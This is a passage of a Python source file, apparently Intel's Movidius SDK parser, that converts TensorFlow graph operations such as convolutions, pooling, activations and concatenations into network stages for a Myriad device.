| 44.784681 | 186 | 0.392642 | # Copyright 2017 Intel Corporation.
# The source code, information and material ("Material") contained herein is
# owned by Intel Corporation or its suppliers or licensors, and title to such
# Material remains with Intel Corporation or its suppliers or licensors.
# The Material contains proprietary information of Intel or its suppliers and
# licensors. The Material is protected by worldwide copyright laws and treaty
# provisions.
# No part of the Material may be used, copied, reproduced, modified, published,
# uploaded, posted, transmitted, distributed or disclosed in any way without
# Intel's prior express written permission. No license under any patent,
# copyright or other intellectual property rights in the Material is granted to
# or conferred upon you, either expressly, by implication, inducement, estoppel
# or otherwise.
# Any license under such intellectual property rights must be express and
# approved by Intel in writing.
import sys
import tensorflow as tf
import google.protobuf as proto
import numpy as np
import math
import re
from Models.Network import *
from Models.NetworkStage import *
from Models.EnumDeclarations import *
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import ops
from Controllers.TensorFlowPreproc import TFPreprocessor
from Controllers.TensorFlowPreproc import PatternType
sys.setrecursionlimit(5000)
placeholder_dict = {}
const_dict = {}
node_dict = {}
variable_dict = {}
concat_tracker = []
reshape_tracker = []
identity_tracker = []
padding_tracker = []
inputnode = 'input'
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2"
def apply_padding(pad_type, in_dim, kernel_dim, stride_dim):
if pad_type == b'SAME':
return same_padding(in_dim, kernel_dim, stride_dim)
elif pad_type == b'VALID':
return valid_padding(in_dim, kernel_dim, stride_dim)
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"No Such Pad Type Supported." +
str(pad_type))
def same_padding(in_dim, kernel_dim, stride_dim):
"""
Calculates the output dimension and also the padding required for that dimension.
:param in_dim: Width/Height of Input
:param kernel_dim: Width/Height of Kernel
:param stride_dim: Vertical/Horizontal Stride
"""
output_dim = math.ceil(float(in_dim) / float(stride_dim))
pad = ((output_dim - 1) * stride_dim + kernel_dim - in_dim) / 2
return output_dim, pad
def valid_padding(in_dim, kernel_dim, stride_dim):
output_dim = math.ceil(float(in_dim - kernel_dim + 1) / float(stride_dim))
pad = 0
return output_dim, pad
def get_deconv_padding(input_shape, output_shape, kernel_shape, stride):
"""
input_shape: N,H,W,C
output_shape: N,H,W,C
kernel_shape: kh,kw
stride: 1,sh,sw,sc
"""
pady = 0
padx = 0
# 2Xpad = stride X (input - 1) + kernel - out
pady = stride[1] * (input_shape[1] - 1) + kernel_shape[0] - output_shape[1]
padx = stride[2] * (input_shape[2] - 1) + kernel_shape[1] - output_shape[2]
if (pady % 2 == 1):
pady = -1
else:
pady = pady / 2
if (padx % 2 == 1):
padx = -1
else:
padx = padx / 2
return int(pady), int(padx)
def get_input(name, fail=True):
global placeholder_dict
global const_dict
global concat_tracker
global reshape_tracker
global identity_tracker
if len(concat_tracker) != 0:
# We track all previous concats, as we may have a many-to-many
# connection
for concat in concat_tracker:
if concat[0] == name:
# If the next layer will try to attach to the non-existant
# concat intermediary node.
ret = []
for l in concat[1]:
a = get_input(l)
if isinstance(a[0], list):
for a1 in a[0]:
ret.append(a1)
else:
ret.append(a[0])
return [ret]
if len(reshape_tracker) != 0:
for reshape in reshape_tracker:
if reshape[0] == name:
return get_input(reshape[1])
if len(identity_tracker) != 0:
for idn in identity_tracker:
if idn[0] == name:
if idn[1] == inputnode:
return None
if get_input(idn[1], False) == 0:
return 0
return get_input(idn[1])
if name == inputnode:
return None
if name in node_dict.keys():
return [node_dict[name].unprocessed_name]
if not fail:
return 0
if name in const_dict.keys():
throw_error(
ErrorTable.StageDetailsNotSupported,
"Top Not Supported - Constants " +
str(name))
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Top Not Found " + str(name))
def get_padding_input(name):
global padding_tracker
for padding in padding_tracker:
if padding[0] == name:
return padding[1], padding[2]
return None, None
def have_first_input(name):
if name == inputnode:
return True
if len(identity_tracker) != 0:
for idn in identity_tracker:
if idn[0] == name:
if idn[1] == inputnode:
return True
return False
def strip_tensor_id(word):
return word.replace(':0', '').replace(':','#')
# Count how many times we need this as an input
def count_inputs(t):
graph = tf.get_default_graph()
count = 0
for node in graph.get_operations():
for a in node.inputs:
if a.name == t:
count = count + 1
return count
def parse_tensor(arguments, myriad_conf, preprocess=True, debug=False, file_gen=False):
global const_dict
global placeholder_dict
global node_dict
global concat_tracker
global identity_tracker
global reshape_tracker
global padding_tracker
global inputnode
path = arguments.net_description
image = arguments.image
output_node_name = arguments.output_node_name
input_node_name = arguments.input_node_name
filename = arguments.outputs_name
if input_node_name is not None:
inputnode = input_node_name
# debug = True
with tf.Session() as sess:
filetype = path.split(".")[-1]
if filetype == 'pb':
graph_def = graph_pb2.GraphDef()
with open(path, 'rb') as f:
graph_def.ParseFromString(f.read())
tf.import_graph_def(graph_def, name="")
else:
saver = tf.train.import_meta_graph(path, clear_devices=True)
if saver is not None:
weight_filename = arguments.net_weights
if weight_filename == None:
weight_filename = path[:path.rfind('.')]
saver.restore(sess, weight_filename)
graph = tf.get_default_graph()
preprocessor = None
if preprocess:
preprocessor = TFPreprocessor()
preprocessor.preprocess(graph)
inputTensor = graph.get_tensor_by_name(inputnode + ':0')
if output_node_name is None:
output_node_name = 'output'
try:
outputTensor = graph.get_tensor_by_name(output_node_name + ':0')
except:
throw_error(ErrorTable.NoOutputNode, output_node_name + ':0')
shape = inputTensor.get_shape()
if shape.dims is None:
# If the network does not give an input shape, assume this
# we will need to add this as a parameter
shape = [1, 224, 224, 3]
if arguments.input_size:
shape = [1,
arguments.input_size[1],
arguments.input_size[0],
3]
if isinstance(shape, tf.TensorShape):
shape_list = shape.as_list()
# Tensorflow can have None in the batch size field of the
# input shape, if that is the case then set it to 1
if None == shape_list[0]:
shape_list[0] = 1
shape = shape_list
inputTensor.set_shape(shape)
elif None in shape:
throw_error(ErrorTable.TFNotEvaluated)
if image is None or image == "Debug":
input_data = np.random.uniform(0, 1, shape)
if debug:
print("Input image shape", shape)
else:
input_data = parse_img(image,
[int(shape[0]),
int(shape[3]),
int(shape[1]),
int(shape[2])],
raw_scale=arguments.raw_scale,
mean=arguments.mean,
channel_swap=arguments.channel_swap)
input_data = input_data.transpose([0, 2, 3, 1])
network = Network("TensorFlow Network", input_data)
arguments.network = network
res = outputTensor.eval(feed_dict={inputnode + ':0' : input_data})
prev_node = None
prev_node_label = None
cnt = 0
inputfound = False
for idx, node in enumerate(graph.get_operations()):
if debug:
print(" ", idx, node.type, node.name)
for a in node.inputs:
print(" IN:", a.name)
for a in node.outputs:
print(" OUT:", a.name)
if not inputfound:
if have_first_input(strip_tensor_id(node.outputs[0].name)):
inputfound = True
if debug:
print('Starting to process')
continue
# Each layer can have a placeholder for the batch size.
for output_item in node.outputs:
item_shape = output_item.shape.as_list()
if len(item_shape) > 0 and \
item_shape[0] == None:
item_shape[0] = 1
output_item.set_shape(item_shape)
if preprocessor:
pattern_found, current_pattern = preprocessor.pattern_found(node)
if pattern_found:
if current_pattern.get_type() == PatternType.Completed:
continue
else:
if current_pattern.get_type() == PatternType.LeakyReLU:
if debug:
print("LeakyRelu")
if len(current_pattern.get_input_shape()) == 4:
node.outputs[0].set_shape([current_pattern.get_input_shape()[0],
current_pattern.get_input_shape()[1],
current_pattern.get_input_shape()[2],
current_pattern.get_output_shape()[3]])
elif len(current_pattern.get_input_shape()) == 2:
node.outputs[0].set_shape([current_pattern.get_input_shape()[0],
current_pattern.get_input_shape()[1]])
else:
throw_error(ErrorTable.StageDetailsNotSupported, "Unsupported LeakyRelu Dimensions")
prev_node.postOp = StageType.leaky_relu
prev_node.post_param1 = current_pattern.get_param(0)
prev_node.changeName(current_pattern.get_name())
prev_node_label = strip_tensor_id(current_pattern.get_prev_name())
node_dict[prev_node_label] = prev_node
else:
throw_error(ErrorTable.StageDetailsNotSupported,
"Pattern not supported " + str(current_pattern.get_type().name))
if node.type == "Const":
const_dict[node.name] = node.outputs[0].get_shape()
elif node.type == "Placeholder":
placeholder_dict[node.name] = node.outputs[0].get_shape()
elif node.type == 'Variable' or node.type == 'VariableV2':
variable_dict[node.name] = node.outputs[0].get_shape()
elif node.type == "Conv2D":
if debug:
print("Conv2D")
inputs = node.inputs[0]
input_shape = inputs.get_shape()
# If the network does not have predetermined input shape, take
# if from input
if input_shape.dims is None and inputs.name == input_node_name + ':0':
input_shape = input_data.shape
taps = node.inputs[1]
taps_shape = node.inputs[1].get_shape()
outputs = node.outputs[0].get_shape()
ksize = taps_shape[0]
stride = node.get_attr("strides")
output_size = [input_shape[0],
apply_padding(node.get_attr("padding"),
int(input_shape[1]),
int(ksize),
stride[1])[0],
apply_padding(node.get_attr("padding"),
int(input_shape[2]),
int(ksize),
stride[2])[0],
outputs[3]]
node.outputs[0].set_shape(output_size)
top, padding = get_padding_input(strip_tensor_id(inputs.name))
padx = 0
pady = 0
padstyle = PadStyle.tfsame if node.get_attr(
"padding") == b'SAME' else PadStyle.tfvalid
if top is not None:
if top == inputnode:
top = None
else:
top = [top]
pady = padding[1][0]
padx = padding[2][0]
padstyle = PadStyle.caffe
input_shape = [
input_shape[0],
input_shape[1] - 2 * pady,
input_shape[2] - 2 * padx,
input_shape[3]]
else:
top = get_input(strip_tensor_id(inputs.name))
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
pady,
padx,
padstyle,
DataType.fp16,
DataType.fp16,
StageType.convolution,
int(taps_shape[0]),
int(taps_shape[1]),
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
int(taps_shape[0]),
int(taps_shape[1]),
int(taps_shape[3]),
np.array(taps.eval()),
TapsOrder.orderHWCK,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
# node_dict
cnt += 1
elif node.type == 'DepthwiseConv2dNative':
if debug:
print("DepthwiseConv2dNative")
inputs = node.inputs[0]
input_shape = inputs.get_shape()
# If the network does not have predetermined input shape, take
# if from input
if input_shape.dims is None and inputs.name == input_node_name + ':0':
input_shape = input_data.shape
taps = node.inputs[1]
taps_shape = node.inputs[1].get_shape()
outputs = node.outputs[0].get_shape()
ksize = taps_shape[0]
stride = node.get_attr("strides")
output_size = [input_shape[0],
apply_padding(node.get_attr("padding"),
int(input_shape[1]),
int(ksize),
stride[1])[0],
apply_padding(node.get_attr("padding"),
int(input_shape[2]),
int(ksize),
stride[2])[0],
outputs[3]]
if debug:
print(output_size)
node.outputs[0].set_shape(output_size)
top, padding = get_padding_input(strip_tensor_id(inputs.name))
padx = 0
pady = 0
padstyle = PadStyle.tfsame if node.get_attr(
"padding") == b'SAME' else PadStyle.tfvalid
if top is not None:
if top == inputnode:
top = None
else:
top = [top]
pady = padding[1][0]
padx = padding[2][0]
padstyle = PadStyle.caffe
input_shape = [
input_shape[0],
input_shape[1] - 2 * pady,
input_shape[2] - 2 * padx,
input_shape[3]]
else:
top = get_input(strip_tensor_id(inputs.name))
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
taps2 = np.array(taps.eval())
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
pady,
padx,
padstyle,
DataType.fp16,
DataType.fp16,
StageType.depthwise_convolution,
int(taps_shape[0]),
int(taps_shape[1]),
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
int(taps_shape[0]),
int(taps_shape[1]),
int(taps_shape[2]) * int(taps_shape[3]),
taps2,
TapsOrder.orderHWCK,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
# node_dict
cnt += 1
elif node.type == "Conv2DBackpropInput":
inputs = node.inputs[2]
input_shape = inputs.get_shape()
# If the network does not have predetermined input shape, take
# if from input
if input_shape.dims is None and inputs.name == input_node_name + ':0':
input_shape = input_data.shape
taps = node.inputs[1]
taps_shape = node.inputs[1].get_shape().as_list()
outputs = node.outputs[0].get_shape()
ksize = [taps_shape[0], taps_shape[1]]
stride = node.get_attr("strides")
output_size = node.inputs[0].eval()
node.outputs[0].set_shape(output_size)
top, padding = get_padding_input(strip_tensor_id(inputs.name))
pady, padx = get_deconv_padding(input_shape.as_list(), output_size, ksize, stride)
if pady < 0 or padx < 0:
throw_error(ErrorTable.StageDetailsNotSupported, "Wrong deconvolution output shape.")
padstyle = PadStyle.caffe
if top is not None:
if top == inputnode:
top = None
else:
top = [top]
pady = padding[1][0]
padx = padding[2][0]
input_shape = [
input_shape[0],
input_shape[1] - 2 * pady,
input_shape[2] - 2 * padx,
input_shape[3]]
else:
top = get_input(strip_tensor_id(inputs.name))
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
tapval = taps.eval()
tapval = np.swapaxes(tapval, 2, 3)
tapval = tapval[::-1,::-1,:,:]
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
pady,
padx,
padstyle,
DataType.fp16,
DataType.fp16,
StageType.deconvolution,
int(taps_shape[0]),
int(taps_shape[1]),
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
int(taps_shape[0]),
int(taps_shape[1]),
int(taps_shape[2]),
np.array(tapval),
TapsOrder.orderHWCK,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
# node_dict
cnt += 1
elif (node.type == 'BiasAdd' or node.type == 'Add' and
get_input(strip_tensor_id(node.inputs[0].name), False) != 0 and
get_input(strip_tensor_id(node.inputs[1].name), False) == 0 and
len(node.inputs[0].get_shape()) != 1):
if debug:
print("BiasAdd")
inputs = node.inputs[0].get_shape()
bias_data = node.inputs[1]
outputs = node.outputs[0].get_shape()
if(len(inputs) == 4):
node.outputs[0].set_shape(
[inputs[0], inputs[1], inputs[2], outputs[3]])
elif(len(inputs) == 2):
node.outputs[0].set_shape([inputs[0], inputs[1]])
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported Bias Dimensions")
prev_node = network.search(strip_tensor_id(node.inputs[0].name))
bias = np.array(bias_data.eval())
if bias.size == 1:
#bias is a constant, transform it to a vector
prev_node.addBias( (np.ones(outputs) * bias).astype(np.float16) )
else:
prev_node.addBias( bias.astype(np.float16) )
prev_node_label = strip_tensor_id(node.outputs[0].name)
prev_node.changeName(prev_node_label)
node_dict[prev_node_label] = prev_node
elif node.type == "MaxPool":
if debug:
print("MaxPool")
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
ksize = node.get_attr("ksize")
stride = node.get_attr("strides")
pad = 0
output_size = [input_shape[0],
apply_padding(node.get_attr("padding"),
int(input_shape[1]),
int(ksize[1]),
stride[1])[0],
apply_padding(node.get_attr("padding"),
int(input_shape[2]),
int(ksize[2]),
stride[2])[0],
outputs[3]]
node.outputs[0].set_shape(output_size)
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(
strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.tfsame if node.get_attr("padding") == b'SAME' else PadStyle.tfvalid,
DataType.fp16,
DataType.fp16,
StageType.max_pooling,
ksize[1],
ksize[2],
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
ksize[1],
ksize[2],
int(output_size[3]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "Relu":
if debug:
print("ReLU")
inputs = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
if(len(inputs) == 4):
node.outputs[0].set_shape(
[inputs[0], inputs[1], inputs[2], outputs[3]])
elif(len(inputs) == 2):
node.outputs[0].set_shape([inputs[0], inputs[1]])
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported ReLU Dimensions")
prev_node.postOp = StageType.relu
prev_node_label = strip_tensor_id(node.outputs[0].name)
prev_node.changeName(prev_node_label)
node_dict[prev_node_label] = prev_node
elif node.type == "Relu6":
if debug:
print("ReLU6")
inputs = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
if(len(inputs) == 4):
node.outputs[0].set_shape(
[inputs[0], inputs[1], inputs[2], outputs[3]])
elif(len(inputs) == 2):
node.outputs[0].set_shape([inputs[0], inputs[1]])
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported ReLU Dimensions")
prev_node.postOp = StageType.relu_x
prev_node.post_param1 = 6.0
prev_node_label = strip_tensor_id(node.outputs[0].name)
prev_node.changeName(prev_node_label)
node_dict[prev_node_label] = prev_node
elif node.type == "LRN":
if debug:
print("LRN")
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
node.outputs[0].set_shape(
[input_shape[0], input_shape[1], input_shape[2], outputs[3]])
top = get_input(strip_tensor_id(inputs.name))
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
bias = np.array([node.get_attr("bias"),
node.get_attr("alpha") * (2 * node.get_attr("depth_radius") + 1),
node.get_attr("beta"),
0], dtype=np.float16)
prev_node = NetworkStage(
strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.LRN,
0,
2 * node.get_attr("depth_radius") + 1,
1,
1,
xyz[0],
xyz[1],
xyz[2],
0,
0,
xyz[2],
None,
None,
bias,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "MatMul": # Note: Assuming MatMul and FCL are the same.
if debug:
print("FCL / MatMul")
inputs = node.inputs
input_shape = node.inputs[0].get_shape()
taps = node.inputs[1]
taps_shape = node.inputs[1].get_shape()
outputs = node.outputs[0].get_shape()
node.outputs[0].set_shape([node.inputs[0].get_shape()[0],
node.inputs[1].get_shape()[1]])
top = get_input(strip_tensor_id(inputs[0].name))
if len(input_shape) == 2:
xyz = (0, int(input_shape[0]), int(input_shape[1])) #0 is special flag for saying the input is 2D
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.fully_connected_layer,
1,
1,
1,
1,
xyz[0],
xyz[1],
xyz[2],
1,
1,
int(taps_shape[1]),
np.array(taps.eval()).astype(np.float16),
TapsOrder.orderHWCK,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "Softmax" or node.type == "Sigmoid" or node.type == "Tanh":
if debug:
print(node.type)
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
if(len(input_shape) == 4):
node.outputs[0].set_shape(
[input_shape[0], input_shape[1], input_shape[2], outputs[3]])
elif(len(input_shape) == 2):
node.outputs[0].set_shape([input_shape[0], input_shape[1]])
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported " + node.type + " dimensions")
taps_shape = [1, 1, 1, 1]
stride = [1, 1, 1, 1]
pad = 0
opParams=None
if node.type == "Softmax":
stagetype = StageType.soft_max
opParams = np.array([1], dtype=np.dtype("<i4")) # softmax would be performed on C - axis
elif node.type == "Sigmoid":
stagetype = StageType.sigmoid
else:
stagetype = StageType.tanh
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, int(input_shape[0]), int(input_shape[1]))
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
stagetype,
int(taps_shape[0]),
int(taps_shape[0]),
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
int(taps_shape[0]),
int(taps_shape[0]),
int(input_shape[1]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments,
opParams=opParams)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "AvgPool":
if debug:
print("Avg Pool")
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
ksize = node.get_attr("ksize")
stride = node.get_attr("strides")
pad = 0
output_size = [input_shape[0],
apply_padding(node.get_attr("padding"),
int(input_shape[1]),
int(ksize[1]),
stride[1])[0],
apply_padding(node.get_attr("padding"),
int(input_shape[2]),
int(ksize[2]),
stride[2])[0],
outputs[3]]
node.outputs[0].set_shape(output_size)
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(
strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.tfsame if node.get_attr("padding") == b'SAME' else PadStyle.tfvalid,
DataType.fp16,
DataType.fp16,
StageType.average_pooling,
ksize[1],
ksize[2],
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
ksize[1],
ksize[2],
int(output_size[3]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "Mean":
if debug:
print("Mean")
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
dimensions = node.inputs[1].eval()
if dimensions[0] != 1 or dimensions[1] != 2:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported Mean operation")
outputs = node.outputs[0].get_shape()
ksize = [0, int(input_shape[1]), int(input_shape[2]), 0]
stride = [1, 1, 1, 1]
output_size = [input_shape[0], 1, 1, outputs[3]]
node.outputs[0].set_shape(output_size)
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.tfvalid,
DataType.fp16,
DataType.fp16,
StageType.average_pooling,
ksize[1],
ksize[2],
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
ksize[1],
ksize[2],
int(output_size[3]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "Reshape":
if debug:
print("Reshape")
inputs = node.inputs
input_shape = node.inputs[0].get_shape()
desired_shape = node.inputs[1].eval()
# Check for -1 in desired_shape
if -1 in desired_shape:
if desired_shape[desired_shape == -1].size > 1:
throw(
ErrorTable.StageDetailsNotSupported,
"Illegal Reshape dimension")
# desired_shape = np.reshape(input_shape.as_list(), desired_shape)[0]
input_size = input_shape.num_elements()
desired_size = np.product(desired_shape[desired_shape >= 0])
negative_index = np.argmin(desired_shape)
desired_shape[negative_index] = input_size / desired_size
node.outputs[0].set_shape(desired_shape)
reshape_tracker += [(strip_tensor_id(node.outputs[0].name),
strip_tensor_id(inputs[0].name))]
elif node.type == "Shape":
if debug:
print(node.type, len(node.inputs[0].get_shape()))
elif node.type == "Squeeze":
if debug:
print("Squeeze")
identity_tracker += [(strip_tensor_id(node.outputs[0].name),
strip_tensor_id(node.inputs[0].name))]
elif node.type == "Identity":
if debug:
print("Identity")
inputs = node.inputs
input_shape = node.inputs[0].get_shape()
node.outputs[0].set_shape(node.inputs[0].get_shape())
identity_tracker += [(strip_tensor_id(node.outputs[0].name),
strip_tensor_id(inputs[0].name))]
elif node.type == "NoOp":
if debug:
print("No OP")
pass
elif (node.type == "Concat" or node.type == "ConcatV2") and not node.inputs[0].dtype.is_integer:
explicit = False
#If at least one input is const, do explicit concat
for i in range(0, len(node.inputs)-1):
if get_input(strip_tensor_id(node.inputs[i].name), False) == 0:
explicit = True
break
if explicit or arguments.explicit_concat:
if debug:
print('Explicit concat')
if node.type == 'Concat':
axis_select = node.inputs[0].eval()
input_indices = range(1, len(node.inputs))
else:
axis_select = node.inputs[-1].eval()
input_indices = range(0, len(node.inputs) - 1)
outstride = 0
for idx in input_indices:
outstride += int(node.inputs[idx].get_shape()[axis_select])
outstride *= 2
for idx in input_indices:
inshape = list(node.inputs[idx].get_shape())
while len(inshape) < 4:
inshape.insert(0,1)
in_node = get_input(strip_tensor_id(node.inputs[idx].name), False)
taps = None
if in_node == 0:
#Node not found, we assume it's a constant
taps = np.array(node.inputs[idx].eval())
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name) + '_' + str(idx), [in_node] if in_node!=0 and in_node is not None else None, StorageOrder.orderYXZ,
0, 0, PadStyle.none,
DataType.fp16, DataType.fp16,
StageType.copy, # op_type
1, 1, # op_x, op_y,
1, 1, # sx, sy,
int(inshape[1]), int(inshape[2]), int(inshape[3]), # X, Y, Z
0, 0, int(inshape[3]),
taps, TapsOrder.orderHWCK, None, # taps, taps_order, bias,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
myriad_config=myriad_conf, args=arguments)
network.attach(prev_node)
#What follows will work only if axis_select is on the last index
if idx == 0:
outputPointer, outputIndex = prev_node.setoutput(outstride)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
else:
prev_node.setoutput(outstride, outputPointer, outputIndex)
outputPointer = outputPointer + 2 * int(inshape[3])
cnt += 1
continue
if debug:
print("Concat")
concat_channel_size = 0
inputs = node.inputs
for src in inputs:
dim = len(src.get_shape())-1
if dim > 0:
concat_channel_size += int(src.get_shape()[dim])
a_input = node.inputs[1].get_shape()
if len(a_input) == 2:
node.outputs[0].set_shape([a_input[0], concat_channel_size])
else:
node.outputs[0].set_shape([a_input[0], a_input[1], a_input[2], concat_channel_size])
rep_arr = []
if node.type == 'Concat':
for inp in inputs[1:]:
rep_arr.append(strip_tensor_id(inp.name))
else:
for inp in inputs[:-1]:
rep_arr.append(strip_tensor_id(inp.name))
concat_tracker += [(strip_tensor_id(node.outputs[0].name), rep_arr)]
elif ((node.type == 'Add' or node.type == 'Mul' or node.type == 'Maximum') and
get_input(strip_tensor_id(node.inputs[0].name), False) != 0 and
get_input(strip_tensor_id(node.inputs[1].name), False) != 0):
# Elementwise operations of the outputs of two existing nodes
if debug:
print(node.type)
top = [get_input(strip_tensor_id(node.inputs[0].name))[0],
get_input(strip_tensor_id(node.inputs[1].name))[0]]
input_shape = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, int(input_shape[0]), int(input_shape[1]))
if node.type == 'Add':
op = StageType.eltwise_sum
elif node.type == 'Mul' and node.inputs[1].shape[-1] == 1:
op = StageType.scale_with_scalar
elif node.type == 'Mul':
op = StageType.eltwise_prod
else:
op = StageType.eltwise_max
prev_node = NetworkStage(
strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
op,
1,
1,
1,
1,
xyz[0],
xyz[1],
xyz[2],
xyz[0],
xyz[1],
xyz[2],
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif ((node.type == 'Mul' or node.type == 'Div' or node.type == 'RealDiv') and prev_node_label is not None and
(strip_tensor_id(node.inputs[0].name) == prev_node_label or strip_tensor_id(node.inputs[1].name) == prev_node_label)):
# We are probably multiplying with a constant, try
iidx = 1 if strip_tensor_id(node.inputs[1].name) == prev_node_label else 0
# Check if absorption is possible into a convolution, to be possible, we should use
# the convolution output only once, here
if prev_node.op == StageType.convolution and count_inputs(
prev_node_label + ":0") == 1:
if debug:
print('Mul with constant absorbed into convolution')
if node.type == 'Mul':
prev_node.taps = np.multiply(
prev_node.taps, node.inputs[1 - iidx].eval()) # Eval may fail
if prev_node.bias is not None:
prev_node.bias = np.multiply(
prev_node.bias, node.inputs[1 - iidx].eval()) # Eval may fail
else:
prev_node.taps = np.divide(
prev_node.taps, node.inputs[1 - iidx].eval()) # Eval may fail
if prev_node.bias is not None:
prev_node.bias = np.divide(
prev_node.bias, node.inputs[1 - iidx].eval()) # Eval may fail
node_dict[node.name] = node_dict[prev_node_label]
prev_node_label = node.name
prev_node.name = prev_node.unprocessed_name + '/' + strip_tensor_id(node.outputs[0].name)
prev_node.changeName(prev_node.name)
prev_node.alias.append(prev_node.unprocessed_name)
prev_node.alias.append(strip_tensor_id(node.outputs[0].name))
else:
if debug:
print('Mul with constant')
inputs = node.inputs[iidx]
input_shape = node.inputs[iidx].get_shape()
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
